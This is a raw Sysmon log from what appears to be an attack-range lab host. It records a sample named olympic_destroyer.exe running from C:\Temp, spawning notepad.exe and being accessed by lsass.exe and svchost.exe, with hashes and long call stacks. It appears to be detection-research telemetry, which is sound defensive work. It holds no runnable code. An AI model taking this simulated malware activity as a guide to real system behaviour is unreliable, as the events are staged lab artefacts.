11:16:08.413{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe{C8EA50B7-1778-6216-2B07-000000003802}6808C:\Windows\SysWOW64\notepad.exe57160x0000000000F30000-- 10341000x8000000000000000297450Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.408{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297449Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.408{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297448Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.407{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297447Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.392{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297446Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.392{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1778-6216-2B07-000000003802}6808C:\Windows\SysWOW64\notepad.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297445Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.392{C8EA50B7-12E6-6216-4B05-000000003802}67926764C:\Temp\olympic_destroyer.exe{C8EA50B7-1778-6216-2B07-000000003802}6808C:\Windows\SysWOW64\notepad.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+d7f5c(wow64)|C:\Temp\olympic_destroyer.exe+6657|C:\Temp\olympic_destroyer.exe+79f9|C:\Temp\olympic_destroyer.exe+7a71|C:\Temp\olympic_destroyer.exe+b4a4|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000297444Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.392{C8EA50B7-1778-6216-2B07-000000003802}6808C:\Windows\SysWOW64\notepad.exe10.0.14393.4169 (rs1_release.210107-1130)NotepadMicrosoft® Windows® Operating SystemMicrosoft CorporationNOTEPAD.EXE"C:\Windows\system32\notepad.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=D27FAB8724322567278AF94C081C47B4,SHA256=D29695852FF215B71F3D1C4FB9AAD6B4577B7547C2C1F11979A561A3C278FF0A,IMPHASH=1EAF57BB311D73086254C6A741E2F932{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000297443Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.392{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1778-6216-2B07-000000003802}6808C:\Windows\SysWOW64\notepad.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297442Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.346{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297441Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.346{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297440Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.314{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297439Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.314{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297438Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.292{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297437Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.292{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297436Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.261{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297435Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.261{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297434Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.246{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297433Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.246{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297432Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.214{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297431Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.214{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297430Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.192{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297429Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.192{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297428Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.176{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297427Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.176{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297426Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.161{C8EA50B7-F11F-6215-1500-000000003802}10926700C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 